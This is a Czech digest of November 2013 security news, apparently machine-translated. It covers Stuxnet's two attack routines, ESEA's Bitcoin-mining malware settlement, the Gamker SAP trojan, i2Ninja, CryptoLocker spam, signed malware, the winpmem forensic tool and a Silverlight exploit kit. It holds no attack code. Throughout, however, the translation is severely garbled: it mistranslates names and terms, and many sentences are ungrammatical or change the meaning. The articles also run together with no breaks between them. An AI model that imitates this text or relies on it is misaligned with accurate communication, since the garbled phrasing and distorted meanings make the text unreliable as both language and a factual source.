Nakonec, Langner řekl, Stuxnet může sloužit dvěma účelům: 1) naruší íránský jaderný program, a 2) umožňují útočníkovi, aby se prohnul své cyberweaponry svalů.
"Provoz olympijské hry začalo jako experiment s nepředvídatelným výsledkem. Podél silnice, jedním z důsledků bylo jasné: Digitální zbraně práce . A liší se od svých analogových protějšků, ale nedávejte vojenské síly v cestě ublížení, které produkují menší vedlejší škody, které mohou být nasazeny plíživě, a oni jsou skoro zadarmo, "napsal Langner. "Obsah této Pandořiny skříňky mít důsledky daleko přesahující Íránu, které byly vyrobeny analogový válka vypadat low-tech, brutální, a tak 20. století . "
Herní platforma usadí na Bitcoin Obvinění Těžební Malware 22.11.2013 Viry
ESEA League, on-line konkurenční herní komunity, se rozhodli usadit se ve státě New Jersey po jednající generálním prokurátorem, že tvrdil, že provozovatel herní komunita infikována uživatelských stroje s malware určený k těžbě Bitcoins.
Liga je vlastněna a řízena E-Sports Entertainment, LLC, a je známý pro svou striktní anti-podvádění politika, který je podporován z "průmyslu vedoucí anti-cheat klient", že uživatelé jsou povinni stáhnout.
V BLOGPOST aplikaci na on esea domovské, Společenství cofounder, Eric Thunberg jasně vyplývá, že rozhodnutí esea k vypořádání není ústupkem - a ve skutečnosti se společnost nesouhlasí s - účet New Jersey generálního prokurátora z Bitcoin incidentu.
Bitcoin mining je proces, jehož prostřednictvím Uživatelé Bitcoin vytvářet "bloky", aby bylo možné sledovat a legitimizaci Bitcoin transakcí na veřejném knihy digitálního Crypto-měny, se BlockChain. Generování nový blok se rovná vyřešení složité matematický problém, protože každý nový blok musí obsahovat v něm záznam z předchozího bloku, a tak celý záznam o každé transakci Bitcoin vůbec. Vzhledem k tomu, proces je náročný na zdroje, tvůrci nových bloků jsou odměněni novými Bitcoins.
Generální prokurátor tvrdí, že zaměstnanec ESEA nebo zaměstnanci infikovaných tisíce osobních počítačů malwarem, který umožnil e-Sports sledovat, jaké programy účastníci běhali a nezákonně provádět Bitcoin mining. ESEA údajně svázaný tento malware spolu se svým softwarovým balíkem proti podvádění.
Přesněji řečeno, New Jersey obvinění, že E-Sports vytvořil a nasadit škodlivý software, který umožnil společnosti sledovat počítače svých uživatelů, a to i když se tito uživatelé nejsou podepsány do ESEA lize. ESEA, stát dále tvrdí, rovněž vytvořil botnet působící na výpočetních prostředků svých uživatelů. Účelem tohoto Botnet bylo shromáždit výpočetní sílu z uživatelských počítačů v esea Ligy, aby důlních Bitcoins.
Během náhodného dvoutýdenní lhůtě, stav odhaduje, že E-Sports uneseno více než 14.000 počítačů, a příštích několik 3,500 dolarů těžební Bitcoins.
"To je důležité vyrovnání za New Jersey spotřebitele," řekl úřadující generální prokurátor John J. Hoffman. "Tyto obžalovaní nezákonně unesen tisíce osobních počítačů lidí bez jejich vědomí či souhlasu, a tím získali možnost sledovat své činnosti, moje pro virtuální měna, která měla skutečnou hodnotu dolaru, a jinak napadnout a poškodit jejich počítačů.
Dohoda vyžaduje, aby e-Sports zaplatí stát, 325,000dolar zavěšeného 1.000.000dolar trestu. Kromě toho, společnost, jak bylo dohodnuto, aby upustila od zavedení softwarového kódu, který stáhne do počítače spotřebitelů bez jejich vědomí a povolení, zavázat k programu shody 10 let, a vytvořit speciální stránku na svých internetových stránkách vysvětluje, konkrétní údaje, které shromažďuje, způsob, jakým se shromažďují, a jak se používá informace. Pokud společnost nedodrží nic z toho v příštím desetiletí, bude nucen zaplatit zbývajících 675.000 dolarů.
Také pojmenovaný podle státu je E-Sports softwarový inženýr Sean Hunczak, kterého státní tvrzení pracoval s Thunberg k rozvoji těžby malware Bitcoin, která používá grafické zpracování jednotky předplatitele tiše důlní Bitcoins.
Thunberg je skálopevně přesvědčen, že on a jeho firma jsou vinni z ničeho.
"Dohoda, která byla podepsána dává jednoznačně najevo, že nesouhlasíme, ani se přiznat, že se některý z státu obvinění New Jersey je," napsal Thunberg na internetových stránkách ESEA. "Tisková zpráva generálního prokurátora o naší osady představuje hluboké nepochopení faktů případu, povaze našeho podnikání, a technologie v pochybnost."
Thunberg pokračuje psát, že zaměstnanec zodpovědný za incident Bitcoin "byl ukončen," ačkoli to není jasné, kdo, že zaměstnanec je, a Threatpost nebyl schopen kontaktovat Thunberg k připomínkám.
SAP Trojan založené částečně na Carberp kódu 21.11.2013 Viry Kousek po kousku, podrobnosti o první informace-krást Trojan objevil cílení SAP podnikový software jsou odhalena, a výzkumníci Microsoft již vázány alespoň část svého zdrojového kódu, který nechvalně Carberp bankovnictví Trojan.
Vývojáři Carberp byli zatčeni na Ukrajině, v letošním roce, a jeho zdrojový kód byl spatřen byl prodán na podzemních fórech o několik měsíců později. Analýzou "SAP Trojan", který byl daboval Gamker, vědci zjistili, že jeho kód dálkového ovládání je stejná jako u Carberp, ale to je nemožné říci, zda jsou dva typy malware jsou produktem stejných vývojářů. SAP podnikový software je velmi populární, a je používán v převážné většině špičkových firem, takže Okruh potenciálních cílů je obrovský. Netřeba dodávat, že informace obsažené v systémech, kde je nainstalován tento software je extrémně citlivý. "Gamker je obecně bankovní a informace-krást Trojan. Mezi jeho cíle jsou on-line bankovnictví relace webové prohlížeče, Bitcoin peněženky, veřejné a soukromé klíče, kryptografické nástroje a financí související softwarové aplikace, "vysvětlil vědci. Pokud jde o software SAP, malware je možné se přihlásit úhozů za použití a uložit je do samostatných souborů. To také zaznamenává snímky obrazovky a argumenty příkazového řádku, a poslat to všechno na vzdálené servery ovládaných útočníků. Mezi aplikace, které spouští nahrávání jsou SAP Logon pro klienta systému Windows, počet klientů pro vzdálenou správu, nástroje pro správu TrueCrypt a BestCrypt chráněné souborové systémy, řada aplikací elektronického bankovnictví, a tak dále. malware je po SAP hesla a uživatelská jména, názvy serverů, důvěrných obchodních údajů. Také, podle AV specialisty na Dr. Web , běží proxy server a server VNC na infikovaném počítači, zabraňuje uživatele k návštěvě webové stránky AV společnosti, a umožňuje útočníkům spouštět příkazy ze serveru C & C. Zatímco nejpopulárnější AV řešení tam jsou již odhalování Gamker, nové varianty jsou určitě projít občas prostřednictvím svých sítí -. alespoň na krátkou dobu Microsoft doporučuje správcům, aby se minimalizovalo potenciální škody tím, že omezí přístup uživatelů práva, pokud je to možné implementovat autentizaci 2-faktor, zvýšení povědomí o bezpečnosti mezi zaměstnanci, udržet operační systémy, kritický software a AV řešení na pracovních stanicích aktualizovány, a používají systém detekce narušení sítě detekovat podezřelé příchozí a odchozí spojení.
Multimediální overwriter s Spy funkcemi
21.11.2013 Viry
Včera ráno jsme obdrželi vzorek z Kuby o malware, který vypadá pro následující audio a video souborů, rozšíření po infikování stroj oběti:. MP3, MP4, MPG, AVI, MKV, VOB, DAT, RMVB....... ,. flv,. wav
Jakmile jsou nalezeny soubory, malware přepíše s obecným mp3 skladby, které si můžete poslechnout zde . To je místně zrekonstruovaný verze, pravděpodobně ve stejné zemi výše uvedeného, je zaměřena zejména na španělsky mluvící uživatele. Je napsán v Delphi a podle časového razítka, to byla sestavena dne 10. září 2013. K dispozici je zpráva záměrně v kódu:
!! MUNDO DEL SILENCIO REALIZADO Si no puedes escuchar, ne puedes hablar, si žádný puedes hablar ni escuchar, entonces el mundo quedara en Silencio.
Překlad: Svět dosažených ticha ! Pokud nemůžete poslouchat, můžete ' t mluvit, pokud nemůžete mluvit ani poslouchat, pak svět bude i nadále v tichosti.
Tam je další skryté funkce, aby tento malware, to pozoruje stroje obětí. To krade informace ze schránky, dělá screenshoty a registruje všechny stisky kláves z klávesnice oběti. Vzhledem k tomu, tato skrytá funkce, malware je počáteční akt přepisování audio a video souborů, je pravděpodobně jen odvádí pozornost od svého pravého účelu. Vzorek se šíří přes USB zařízeními výčet disky a dělat kopie sebe sama na ně.
Vzorek byl nejprve zjištěn technologii KSN před tak čas a teď je to také zjištěno prostřednictvím pravidelných aktualizací jako Trojan.Win32.Malex.af
i2Ninja Finanční Malware číhající na I2P darknet
21.11.2013 Viry
Mevade botnet z novinek, kdy bylo zjištěno, že se pomocí Tor anonymita sítě, komunikovat s jeho velení a řízení infrastruktury. Spuštění C & C na Tor, nicméně se ukázalo být fatální chybou , když Tor použití špičatý upozorňující správce na neobvyklou aktivitu.
Skupina ruských zločinců zřejmě bylo dávat pozor na to, co se stalo s Mevade a používáte jiný darknet názvem I2P, nebo neviditelné Internet Protocol, jako komunikační protokol pro nové finanční malware s názvem i2Ninja.
Výzkumníci Trusteer sledování ruského malware fórum skvrnitý i2Ninja , který se zdá být run-of-the-mlýn finanční malware, který obsahuje HTTP vstřikovací schopnosti, e-mail, FTP a formulářů grabbers. Twist na tohle je to, že používá I2P poslat ukradené pověření zpět na útočníky a podporuje Podpora 24/7 jako derivační.
"Nabízí se ten, kdo kupuje malware, v příkazu a řídit sám, přímou linii pohledu s autory a podpůrný tým," řekl Etay Maor, předcházení podvodům řešení manažer Trusteer. "Na ovládacím panelu, které nabízejí 24 / 7 podpora realizována prostřednictvím protokolu I2P.
Poskytování podpory prostřednictvím příkazového a ovládacího panelu je nové, stejně, obecně podpory je zajištěno přes podzemní fóru nebo na webu podpory.
"I2P je podobná Tor v tom, že je to darknet, ale je to vlastně považovány za bezpečnější zločinci," řekl Maor. "To je poprvé, co jsem viděl malware provozu přes I2P a poprvé jsem viděl, že nabízí 24/7 podporu z C & C. To znamená, že mají velkou důvěru v bezpečnost protokolu. "
To je známo, zda je podpora automatizované až C & C, nebo zda se jedná o živý člověk komunikovat s útočníkem. Ostatní malware jako citadely a Neosploit Exploit baterie mají na trh podporu; Neosploit dokonce nabídl stupňová podporu.
"[Podpora] je super důležité. Vzpomínám si, když byl zdrojový kód Zeus unikly a lidé začali rozvíjet vlastní malware, že rozhovory v různých podzemních fórech se o tom, kdo se chystají získat podporu z "Maor řekl. "Lidé, kteří kupují tento malware je možné hledat, jak vydělat peníze, ale nemusí být super technický, jako bývaly v minulosti. Šest nebo sedm let, že lidé, kteří napsali kód, byli lidé, kteří působily malware. To není dnešní případ. Dnes máte kupujícího na trhu a prodávající na trhu. Když si koupíte výrobek dnes můžete očekávat pomoc, aby šel s ním, a pokud máte nějaké dotazy, můžete očekávat někoho mluvit. "
Pokud jde o I2P darknet, stejně jako Tor, to je zvýhodněný lidí, kteří dávají přednost nebo požadovat anonymitu online. Jednotlivci v utlačované oblasti, novinářů, aktivistů a dokonce i zdravotní péče a právní profesionály, kteří vyžadují soukromé, zabezpečené komunikace s klienty používat služby jako je Tor, aby svou práci. Tyto sítě však také přilákat zločince, jako jsou Mevade botmasters a Silk Road gangu , který také provozuje přes Tor, dokud se FBI sundala podzemní trh s drogami na začátku října.
I2P mezitím pracuje na rozdíl od Tor v tom, že je to peer-to-peer protokol a počítače v síti komunikují přes proxy klienta mezi sebou pomocí šifrovaných zpráv.
"Není to jako [Tor] kam procházení Internetu bezpečně, to je pravda, darknet, síť se nemůžete dostat," řekl Maor. "Nemůžeš na Googlu. Můžete ji najít. Je to jeho vlastní protokol, kterým se na vrcholu HTTP. "
Použití I2P také slouží k udržení malware poměrně bezpečné z oblasti vymáhání práva a soupeřící gangy, Maor řekl. Vlády mají zájem o sledování měly omezený úspěch, například v lámání Tor a sledovat komunikaci uživatelů na této síti prostřednictvím špionážní agentury FoxAcid programu a Quantam servery.
"Z toho, co jsem pochopil z různých fórech jsem se účastní, je považován za I2P ještě bezpečnější než Tor," řekl Maor. "I2P je stále považován za pravdivý darknet, něco, co je v současné době ohrožena, nebo nikdo neví, zda to byla ohrožena. To je dost dobrý důvod k tomu, aby použít. "
Výzkumník nabízí nový pohled na Stuxnet-ovládat sabotáž programu 21.11.2013 Viry Stuxnet, malware, že raketa světové bezpečnosti a první zaznamenané počítačové zbraň, má starší a složitější "sourozence", který byl zaměřený také na narušení fungování íránského zařízení na obohacování uranu v Natanzu, ale jejichž modus operandi byl jiný.
Žádost byla podána v nedávno zveřejněné zprávě známý expert německé bezpečnostní řídicí systém a konzultant Ralph Langner, který byl analýzu Stuxnet od okamžiku jeho existence byla poprvé objevena. Ve své zprávě, když poukázal na to, že v zájmu vědět, jak zabezpečit průmyslových řídicích systémů, musíme vědět, co se vlastně stalo, a aby k tomu, že musíme pochopit všechny vrstvy útoku (IT, ICS a fyzické) a být seznámen s aktuální situací všech těchto vrstvy, jak oni byli v době útoku. On pak pokračoval vysvětlit, že Stuxnet vlastně měl dva útočné rutiny. "Oba útoky se zaměřují na poškození odstředivek rotorů, ale používají různé taktiky. První (a složitější) útok pokusy na více než-natlakování odstředivek, druhý útok pokusí překročení otáček odstředivky rotory a aby se jim prostřednictvím svých kritických (rezonance) rychlostí, "sdílel. Výzkumníci se soustředili na druhý, a to především , protože to byl ten, který byl nakonec tak úspěšný. Ale Langner není jediný, kdo se analyzují první (známý) verze Stuxnet - Symantec vědci také vydala na whitepaper na "Stuxnet 0.5", který byl poprvé detekován v přírodě v roce 2007, kdy ji někdo předložen VirusTotal malware skenování služby, ale v době, kdy nikdo nevěděl, co to udělal a jak nebezpečné to je. Tak proč nebyla tato "první" verze nakonec používá? "Výsledky přetlaku útoku nejsou známy," říká Langner. "Ať už byly, útočníci se rozhodli zkusit něco jiného v roce 2009." On spekuluje, že útočníci měli zájem o zpomalení íránského obohacování uranu úsilí, a poškodí velké množství starých odstředivek používaných v závodě by upozornit své operátory, aby Skutečnost, že se něco děje. Ale s pozdějším Stuxnet varianty, útočníci nezdálo se, že nevadí, že moc v případě, že útok byl objeven. "Hodně bylo napsáno o selhání Stuxnet zničit značný počet centrifug, nebo výrazně snížit íránskou výrobu LEU. I když to je nesporné, že se nezdá, že to byl záměr útočníků "," podotkl. "Pokud katastrofální škoda byla způsobena Stuxnet, který by byl v důsledku nehody, spíše než podle účelu. Útočníci byli v pozici, kdy by mohl být zlomený krk oběti, ale oni si vybrali kontinuální časopis dušení místo. " "Stuxnet je low-výnos zbraň s celkovým záměrem snížit životnost íránských odstředivek a aby jejich fantazie řídicí systémy se objeví mimo jejich chápání, "říká, a odhaduje, že Stuxnet nastavit zpět na íránský jaderný program o více než dva roky. On také poukázal na to, že současný katastrofální zničení všech provozních odstředivek by způsobily takové zpoždění, protože Írán byl schopen vyrábět odstředivky v průmyslovém měřítku, a měl obrovské množství z nich již na skladě. On také předpokládá, že zatímco na začátku útočníci - potvrdil , že USA a Izrael - se zajímali o udržení útok v tajnosti, po chvíli měli zájem v tom, kdo za útokem. "Odhalení Stuxnet byl konec operace, ale ne nutně konec jeho užitečnosti. To by se ukázat světu, co kybernetické zbraně může dělat v rukou velmocí, "vysvětluje. "Na rozdíl od vojenské techniky, nelze zobrazovat USB klíčenky na vojenské přehlídce. Útočníci mohou také znepokojeni jiného národa, nejhorší nepřítel, bude nejprve prokázat znalosti v digitální doméně -. scénář nic menšího než další Sputnik moment v americké historii " Langner je zpráva je rozsáhlý a jde do detailu o tom, jak ICS systém a fyzické centrifugy pracují, a vyvrací několik mylných představ o Stuxnet (včetně jedné, jak to utekl z Natanzu do volné přírody). Je to velmi zajímavé čtení, které ukazuje nový pohled na celou věc, a radím všem, aby si ho přečetli.
Falešný "free Bitcoin generátor" nabídka vede k malware 20.11.2013 Viry Rostoucí popularita Bitcoin neprošla bez povšimnutí v on-line podvodníky, a podle ThreatTrack je Chris Boyd , oni začali podvádět uživatele do dokončení on-line průzkumy s příslibem "free" software Bitcoin vytvářejícího. Tyto nabídky jsou zveřejňovány prostřednictvím Youtube videa, Pastebin příspěvky a promo stránky, a když se výslovně uvádí, že dostat Bitcoin generátor nebudete muset dokončit průzkum, budete vyzváni k zaplacení premium účet, aby bylo možné soubor stáhnout.
Pastebin Příspěvků předložit podobnou nabídku, nutit uživatele ke stažení zdarma Bitcoin generátor z účtu net. Nabídka přichází s upozorněním: autor příspěvku není tvůrcem softwaru - to je jen dobrá duše, která chce pomáhat druhým vydělat nějaké peníze. Jiný režim, kde jsou soubory, jejichž hostitelem MEGA žádá pro uživatele k vyřešit některé CAPTCHA, aby mohly být povolen stáhnout generátor. Netřeba dodávat, že tyto soubory nejsou to, co tvrdí, že jsou. Jak v Pastebin hostované nabídky a na MEGA, soubor je Trojan, který má v současné době poměrně nízký míru detekce. Uživatelům se doporučuje mít na pozoru těchto nabídkách, a ne se dostat chamtivost vyzrát na jejich úsudku. Jednoduchý Google hledání názvu souboru v otázce ( BitCoin_Generator_Tool_2013.exe ) odhalí, že existuje mnoho těchto systémů stále na YouTube.
Digitálně podepsán Malware: Co můžete důvěřovat teď? 0 20.11.2013 Viry
Jeden z nejvíce překvapivých zjevení v McAfee Labs Hrozby zprávu, ve třetím čtvrtletí 2013 je to, že pozorované instance digitálně podepsaného malware zvýšil téměř o 50% na více než 1,5 milionu nových podepsané binární soubory. Důsledky tohoto trendu jsou hluboké a to jak pro bezpečnostní praktiky a globální důvěry infrastruktury. Podepsáno MalwareNový Podepsáno malware
Nicméně předtím, než se podíváme na tyto důsledky, pojďme se nejprve podívat na to, proč cybercriminal komunita ještě vadí podepsat své škodlivé náklad. Mnoho podnikových systémů obrany měli pravidlo na místě po mnoho let, která v podstatě říká: "Je-li binární přílohu, je podepsán, je to asi dobře. Nech to být. "Dlouhou dobu to bylo platné pravidlo. Bohužel, před několika lety cybercriminal komunita přišel na to a začal podepsat své vlastní binárky. Tento trend představuje tři klíčové otázky: Jak by cybercriminal gang se údajně legitimní certifikát pro vlastní potřebu? Není to úkol certifikační autority (CA) vydávat certifikáty pouze pro legitimní obchodní zájmy a sledovat jejich využití? Jak podnik bránit této změny v hrozeb? Odpověď na druhou otázku je "ano", ale je to složitý problém z několika důvodů. Za prvé, 50 + velké kořenové certifikační úřady distribuovat své certifikáty stovky "maloobchodní" autorit na celém světě, a to je téměř nemožné sledovat chování všech z nich. Za druhé existují nepoctiví CA působí především mimo dosah globální prosazování práva, který bude vydávat legitimně vypadající certifikáty každému, kdo s kreditní kartou (nebo Bitcoin). Za třetí, legitimní certifikáty se ukrást periodicky ničena pro použití zločinci. Takže z pohledu cybercriminal , získání přístupu k legitimně vypadající digitální certifikát není příliš těžké, není příliš drahé, a může zvýšit "dosah" své malware poměrně výrazně. Jedním ze zajímavých aspektů tohoto trendu je, že i když tam jsou pravděpodobně tisíce digitálních certifikátů, používaných k podpisu malware, zločinci rozhodně mají své favority. McAfee Labs oznámila na Focus 2013 konferenci, že jsme našli několik certifikátů, které byly použity každý podepsat více než 1.000 odlišné kousky malware. Našli jsme další desítky certifikátů, které byly použity k podpisu více než 500 kusů malware. To by byl logický bod vysvětlit, jak a proč tyto systémy ověřování certifikátů nepodaří identifikovat tyto potulné certifikáty, ale to je nad rámec tohoto konkrétního kusu. Tak, aby naše poslední otázka, co bychom měli dělat, abychom se ochránili od této nejnovější taktiku "protivníka"? První věc je si uvědomit, že v současné hrozeb podepsané binární je ve své podstatě nic bezpečnější než nepodepsané jeden. To znamená, že my všichni musíme mít jiné obrany, jejímž účelem je zmírnění této hrozby. Dva nejčastěji používané aplikace jsou pověsti (whitelisting) řešení, jako je ovládání aplikace McAfee a přípravků pro moderní detekce hrozeb, které obsahují tzv. sandboxu technologie, jako je McAfee Threat Defense Advanced . Když šikovně umístěno společně, tyto dva jsou schopny identifikovat nejvíce škodlivý binárky podepsán, nebo ne. V některých prostředích může být také nutné nasazení sítě prevence narušení funkcí, jak bylo zjištěno v zabezpečení McAfee Network Platform . Pokud pracujete v mimořádně citlivém prostředí, můžete také požadovat, aby všechna zařízení v souladu s "společného operačního prostředí" politiky, ve kterém je jeden obraz disku používají všechny systémy a obsahuje pouze známé dobré aplikace a nástroje. Je to hrubou silou přístup a letí do zubů Bring Your Own Device trend, ale je to schůdné řešení v některých prostředích. Postupem času , bude Certifikační služby reputace se zdát, že se velmi podstatně přispívá ke zmírnění této nové hrozbě. Do té doby však, bdělost a mnohovrstevnatý přístup k bezpečnosti v cloudu na obvodu a na koncovém bodě jsou povinné.
Mělo by být trochu argument, že s dnešními hrozbami, vždy byste měli získat obraz paměti při jednání s jakýmkoliv typem malwaru. Moderní stolní počítače mohou mít 16GB RAM nebo více naplněný důkaz, že je obvykle crutial k pochopení toho, co se děje na tomto počítači. Neschopnost získat tu vzpomínku bude analyzovat další forenzní artefakty obtížné nebo v některých případech nemožné. Chad Tilbury ( @ chadtilbury ) mi nedávno řekl o nový nástroj získání paměti, že se chci podělit se čtenáři ISC. To se nazývá winpmem. Je napsal Michael Cohen. Je zdarma a je k dispozici ke stažení zde . Zde je pohled na něj.
Po stažení a rozšiřování zip soubor, uvidíte následující komponenty:
Můžete vidět, že jsou dva spustitelné soubory. Oni jsou jmenováni winpmem_1.4.exe a winpmem_write_1.4.exe. Vrátím se k winpmem_write_1.4.exe později. K dispozici je také "binárky" adresář, který obsahuje několik ovladačů a skript v Pythonu. To zní jako zábava! Vrátím se, že jeden i později. Pro teď, pojďme mluvit o winpmem_1.4.exe. Pokud program spustíte bez parametrů získáte obrazovku s nápovědou. Vypadá to takto:
Chcete-li použít winpmem získat surový obraz paměti, vše, co musíte udělat, je poskytnout mu název souboru. Kopie všech bajtů v paměti budou uloženy do tohoto souboru. Například:
c: \> winpmem_1.4.exe memory.dmp
Tím se vytvoří surový obraz paměti s názvem "memory.dmp" vhodný pro analýzu se volatilita , Mandiants Redline a další. Nástroj lze také vytvořit dump, který je vhodný pro analýzu s Microsoft WinDBG . K tomu stačí přidat "-D" volby do příkazového řádku, jako je tento:
c: \> winpmem_1.4.exe-d crashdump.dmp
Nyní, někteří z vás myslí, "Tak co, já si už vyhodit paměť s dumpit.exe, Win32dd.exe, win64dd.exe a další." No, máte pravdu. Ale pokud máte malware, který hledá pro tyto nástroje, nyní máte další možnost. Zatímco winpmem může vypadat jako mírné vychovaný nástroj získání paměti, že ve skutečnosti má super schopnosti. Nejlepší část winpmem (IMHO) je v těch komponent, které jsem pohodlně zamlžil. Budu se podívat na winpmem_write_1.4.exe a ještě lépe, že Python skript mé další záznam v deníku.
Zájem v Pythonu? Podívejte se na Sans SEC573. Python pro penetrační testery! Učím ho Reston VA 17.března!
Klikněte ZDE pro více informací.
Mám Odeslání provoz na "Sinkhole"?
19.11.2013 Viry
To se stalo běžnou praxí pro nastavení "závrty" zachytit na provoz poslal své infikovaných hostitelů velení a řízení serverů. Tyto Sinkholes jsou obvykle stanoveny po škodlivý doménové jméno bylo objeveno a registrátoři souhlasil přesměrovat příslušné záznamy NS na konkrétní jméno serveru nakonfigurován subjekt, který provozuje na závrtu. V poslední době například Microsoft získal soudní příkazy k převzetí různých doménových jmen spojených s populární malware.
Jakmile sinkhole je prokázáno, že je možné pro provozovatele závrtu shromažďovat IP adresy počítačů napojených na to. V mnoha případech, je hostitel pouze za "infikované", pokud vysílá žádost, která označuje, že je infikován s určitým typem škodlivého. Jednoduchý DNS lookup nebo připojení k serveru fungujících na závrtu by neměla stačit a budou považovány za falešně pozitivní.
Údaje shromážděné závrtů se obvykle používá pro výzkumné účely, a oznámit infikovaných uživatele. Jak dobře toto oznámení funguje do značné míry závisí na spolupráci mezi sinkhole provozovatelem a poskytovatelem připojení k Internetu.
Na druhou stranu, možná budete chtít, aby aktivně sledovat provoz zaměřené na závrtů. Nicméně, neexistuje schválený seznam závrtů. Sinkhole operátoři snaží se propagovat seznam, aby se zabránilo botnet operátorům kódování své roboty, aby se zabránilo závrty, stejně jako se vyhnout pomstě DoS útoky proti síti hosting závrty. Někteří poskytovatelé internetových služeb budou také provozovat vlastní závrty, a ne přímý provoz na "globální" závrtů usnadnit a urychlit zákazníkům oznámení.
Přílohy CryptoLocker e-mailu zaslaného na desítky milionů ve Velké Británii
18.11.2013 Spam | viry
Desítky milionů on-line bankovnictví zákazníky ve Velké Británii jsou cíle nebezpečné spam kampaně nalákat uživatele k otevření přílohy obsahující CryptoLocker Ransomware.
Spojené království je národní trestnou činnost Národní Cyber Crime Unit vykázala poradenské koncem minulého týdne lidé varování k obezřetnosti při otevírání e-mailových příloh, zejména z malých a středních bank a finančních institucí.
"E-maily mohou být rozeslány na desítky milionů zákazníků ve Spojeném království, ale zdá se zaměřit se na malé a střední podniky, zejména," řekl poradenství. "Tento spam události jsou posuzovány jako významné riziko."
Přílohy smysl se o řadu potenciálních problémů s uživatelským účtem, včetně podrobností o podezřelých transakcích, faktury, hlasové zprávy a faxy. Místo toho, oni drop Ransomware na oběti stroj.
"NCA se aktivně skupiny organizovaného zločinu spáchání tohoto druhu trestné činnosti," řekl Lee Miles, zástupce vedoucího NCCU. "Snažíme se ve spolupráci s průmyslem a mezinárodními partnery na identifikaci a postavily před soud osoby odpovědné a snížit riziko pro veřejnost."
US-CERT vydalo poradenství před dvěma týdny o bodcem CryptoLocker infekcí . Na rozdíl od jiných Ransomware podvody, CryptoLocker je schopen najít a šifrování souborů z různých síťových zdrojů a zobrazení banneru oběti požadují výkupné za dešifrovací klíč. Hodiny na banner klíšťata až do doby, kdy se soukromý klíč bude zničen. Známější Ransomware Režimy návaznosti na podobný banner, ale zamknout uživatele z jejich stroje , dokud výkupné zaplaceno.
Útočníci, v tomto případě, jsou náročné 536 liber, v závislosti na NOK, což je přibližně 850 dolarů USA. Oběti je řečeno, že mají, aby se jejich platby útočníků prostřednictvím Bitcoin nebo MoneyPak.
Stejně jako vymáhání práva v USA, NOK radí obětem neplatit výkupné, přidání upozorněním, že neexistuje žádná záruka, že zločinci by dešifrovat soubory nacházejí. Místo toho NOK žádá oběti, aby hlásily CryptoLocker infekcí, akční podvodů , Spojené království je národní podvodů a Internetový zločin centrum zpráv.
CryptoLocker byla v oběhu na několik měsíců, ale infekce začala stoupající minulý měsíc, podle US-CERT poradenství. V USA, útočníci měli úspěch pomocí telefonu Federal Express nebo UPS e-maily sledování oznámení jako návnada.
Malware čichá se soubory v řadě síťových zdrojů, včetně sdílených síťových disků, výměnná média, jako jsou USB flashdisky, externí pevné disky, sdílených síťových souborů a některých služeb cloud storage.
"Pokud jeden počítač v síti nakazí, může namapované síťové jednotky také nakazit," US-CERT varuje poradenství s tím, že oběti by měly okamžitě odpojit své počítače od jejich drátových nebo bezdrátových sítích okamžitě při pohledu na červenou obrazovkou oznámení smířit podle CryptoLocker, který poskytuje informace o tom, jak obnovit šifrované soubory.
Po infekci malware naváže kontakt s útočníkem a ukládá asymetrický šifrovací klíč tam. Výzkumníci společnosti Kaspersky Lab řekl CryptoLocker používá domény algoritmus generace generovat až 1000 doménových jmen, z nichž se připojit na útočníkův velení a řízení infrastruktury. Během tří dnů v říjnu více než 2700 domén pokusil kontaktovat tři CryptoLocker domény sinkholed společnost Kaspersky Lab.
Netflix uživatelé v nebezpečí nevědomky vyzvednutí malware 18.11.2013 Viry Uživatelé Silverlight, Microsoft odpověď na Adobe Flash, jsou v nebezpečí, že malware na svých počítačích nainstalovanou a být moudřejší, jako exploit pro kritické zranitelnosti ( CVE-2013-0634 ) v rámci app byla přidána do Angler využívat kit.
"Tato chyba zabezpečení by mohla umožnit vzdálené spuštění kódu, pokud útočník hostí webové stránky, která obsahuje speciálně vytvořený Silverlight kterého by mohl zneužít tuto chybu zabezpečení, a pak přesvědčí uživatele k návštěvě webové stránky," vysvětlil Microsoft. "Útočník by také mohl využít nedůvěryhodné webové stránky a webové stránky, které přijímají nebo hostují materiál poskytovaný uživateli a reklamu." Oběti nutné pouze napálil k návštěvě takového webu -. bohužel velmi snadný úkol pro útočníky Silverlight se nepodařilo překonat popularitu Flash, ale je to přesto využívá mnoho uživatelů po celém světě, včetně více než 40 milionů uživatelů populární on-demand internetu streaming služby Netflix. Integrace zneužití v soupravě rybář exploitu byl nejprve si všiml badatel za Malware nepotřebují Káva blog, a od té doby byla potvrzena jinými. "Po přistání na exploitu stránce, rybář exploit kit zjistit, zda je Silverlight nainstalován a jaká verze běží. Pokud to podmínky dovolí, je speciálně vytvořený knihovna spustil tuto chybu zabezpečení zneužít Silverlight, " varuje Malwarebytes 'Jerome Segura. "Stejně jako u všech exploit kity, využití zranitelnosti je jen mezistupeň pro skutečné motivu:. Tlačí malware na oběti stroj" zranitelnost byla oprava Microsoft dříve tento rok, ale všichni víme, že mnoho, mnoho uživatelů jsou dost laxní pokud jde o udržení jejich software aktualizovat. V tomto konkrétním případě může mnoho uživatelů, kteří mají nainstalovaný program Silverlight skutečně zapomněl, že to mají na svém počítači, a jsou žalostně pozadu, pokud jde o aktualizacích zabezpečení. Segura doporučuje všem uživatelům, kteří vědí, že se pomocí Silverlight aktualizovat na nejnovější verzi k dispozici, a změnit nastavení tak, aby byly aktualizace nainstalovány automaticky od tohoto okamžiku. "Můžeme očekávat, že tento CVE být integrována do jiných Exploit sad brzy, takže je důležité, aby se ujistil, záplatovat všechny stroje teď, "říká. "Pokud nepotřebujete Silverlight (nebo jiné pluginy), jednoduše ho úplně odstranit tak, že pomůže snížit povrch útoku."
Dejte si pozor na méně pokročilé malware a nové exploit kity
18.11.2013 Viry
Letos Cybersecurity se do centra pozornosti se státem útoků, mnoho vysoce postavených narušení dat a významných cybercriminal zatýkání. Websense Security Labs nastínil své předpovědi 2014 pomáhá organizacím chránit proti útokům v celém řetězci ohrožení zabít.
